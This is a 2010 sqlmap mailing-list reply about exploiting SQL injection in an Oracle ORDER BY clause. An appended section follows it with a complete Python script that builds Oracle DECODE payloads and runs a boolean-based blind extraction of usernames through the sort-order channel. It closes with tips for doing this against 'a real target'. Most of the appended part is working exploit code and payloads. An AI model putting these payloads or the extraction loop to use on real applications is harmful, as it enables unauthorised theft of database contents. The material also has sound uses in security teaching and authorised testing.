Re: [sqlmap-users] injecting in the order by clause
From: Bernardo D. A. G. <ber...@gm...> - 2010-12-22 10:08:42
Hi Karl,

On 19 December 2010 08:39, Buggy <bug...@gm...> wrote:
> ...
> I (and sqlmap) have found my new nemesis concerning SQL injection: injecting
> in the ORDER BY clause:

Good for you.

> I am currently doing work on a webapp based on an ORACLE database and can
> inject here:
>
> …SELECT foo, bar FROM the_table ORDER BY [INJECTION]

sqlmap from the Subversion repository has full support to detect and exploit
injection points in the ORDER BY and GROUP BY clause, regardless of the
back-end DBMS.

> 1) The mean thing is you cannot use UNION because of the ORDER BY clause

True.

> => Any hints on how to get a working injection going here? Has anyone ever
> encountered this rare case?

Yes, several times. svn update and enjoy. Testing for ORDER BY clause
injection against Oracle requires --level to be set to 3. We are going to
update the user's manual just before the official release of 0.9 stable in a
month or two; for the time being, sqlmap.py -h will highlight the meaning of
the new switches (--level, --risk, etc.).

> 2) the furthest I have gotten in a try to get into a blind sql injection
> situation is the following:
>
> [INJECTION] = decode ((select 'a' from dual),'a',foo,bar)
>
> …depending on whether 'a' or something else is selected, the output is sorted
> by column 'foo' or column 'bar'
>
> …the idea is to "ask the question" here (pseudocode):
>
> decode ((select first letter of first username < chr(128)),TRUE,foo,bar)
>
> …but it doesn't work as I do not know how to write the question query or how
> to decide if the answer is TRUE or FALSE
>
> => is there some hint how to continue from here and maybe even get the thing
> working with sqlmap?

Again, svn update. If you want to understand how it works, check yourself the
xml/payloads.xml file, lines 617-634 in your case.

Cheers,

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
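The DECODE trick Buggy describes is a boolean-based blind channel: the only thing the attacker observes is which column the result set is sorted by. The following is an added example (not from this thread and not sqlmap's own payloads) that carries the idea through end to end. It builds the Oracle-syntax payload that would be sent to the real target, and, since no Oracle instance is at hand, simulates the vulnerable `SELECT foo, bar FROM the_table ORDER BY [INJECTION]` query in an in-memory SQLite database, where `CASE` stands in for `DECODE` and `unicode()` for `ASCII()`. The table contents, the `all_users` stand-in for Oracle's ALL_USERS view, and the `MIN(username)` choice of "first username" are all constructed assumptions. The extraction loop answers Buggy's two questions: the "question query" compares one character's code point against a threshold, and TRUE/FALSE is decided by matching the returned row order against the two baseline orderings.

```python
import sqlite3

# Constructed sample data (not from the thread): two columns whose sort orders
# differ, and a stand-in for Oracle's ALL_USERS view holding the secret to recover.
THE_TABLE = [("apple", 3), ("cherry", 1), ("banana", 2)]
ALL_USERS = [("sys_admin",), ("guest",), ("scott",)]


def make_db():
    """In-memory SQLite database simulating the target schema (assumed layout)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE the_table (foo TEXT, bar INTEGER)")
    db.executemany("INSERT INTO the_table VALUES (?, ?)", THE_TABLE)
    db.execute("CREATE TABLE all_users (username TEXT)")
    db.executemany("INSERT INTO all_users VALUES (?)", ALL_USERS)
    return db


def vulnerable_query(db, injection):
    """The query from the thread: attacker text lands unquoted in ORDER BY,
    so UNION is unavailable and only the sort order can be influenced."""
    return db.execute(f"SELECT foo, bar FROM the_table ORDER BY {injection}").fetchall()


def oracle_condition(pos, mid):
    """The 'question' in Oracle syntax: is character `pos` of the first
    username greater than code point `mid`? MIN() yields a single-row scalar
    subquery, so no ROWNUM filter is needed."""
    return f"ASCII(SUBSTR((SELECT MIN(username) FROM all_users),{pos},1))>{mid}"


def oracle_payload(pos, mid):
    """What would be sent to a real Oracle target (hypothetical payload):
    DECODE turns the yes/no answer into a choice of sort column."""
    return (f"DECODE((SELECT CASE WHEN {oracle_condition(pos, mid)} THEN 'a' ELSE 'b' END "
            f"FROM dual),'a',foo,bar)")


def sqlite_payload(pos, mid):
    """Same construction for the local simulation: SQLite has no DECODE, so
    CASE does the column switch, and unicode() replaces Oracle's ASCII()."""
    cond = f"unicode(substr((SELECT MIN(username) FROM all_users),{pos},1))>{mid}"
    return f"CASE WHEN {cond} THEN foo ELSE bar END"


def extract_first_username(db, max_len=30):
    """Boolean-based blind extraction over the ORDER BY channel."""
    sorted_by_foo = vulnerable_query(db, "foo")   # baseline for 'answer is TRUE'
    sorted_by_bar = vulnerable_query(db, "bar")   # baseline for 'answer is FALSE'
    if sorted_by_foo == sorted_by_bar:
        # Practitioner check: if both orderings look identical there is no channel.
        raise RuntimeError("ORDER BY foo and ORDER BY bar give identical output")

    def ask(pos, mid):
        # TRUE iff the page came back sorted by foo.
        return vulnerable_query(db, sqlite_payload(pos, mid)) == sorted_by_foo

    name = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                      # 7-bit ASCII, as in Buggy's chr(128) idea
        while lo < hi:                       # binary search: about 7 requests per character
            mid = (lo + hi) // 2
            if ask(pos, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                          # past the end: SUBSTR gives ''/NULL, every
            break                            # comparison is false, search bottoms out at 0
        name += chr(lo)
    return name


if __name__ == "__main__":
    db = make_db()
    print(oracle_payload(1, 64))
    print(extract_first_username(db))
```

The baseline comparison is the part to get right on a real target: fetch the page once with `ORDER BY foo` and once with `ORDER BY bar`, confirm the two responses actually differ, and only then treat "looks like the foo ordering" as TRUE. If the two columns happen to sort the rows the same way, the channel carries no information and a different pair of columns (or a type-error/time-based question) is needed.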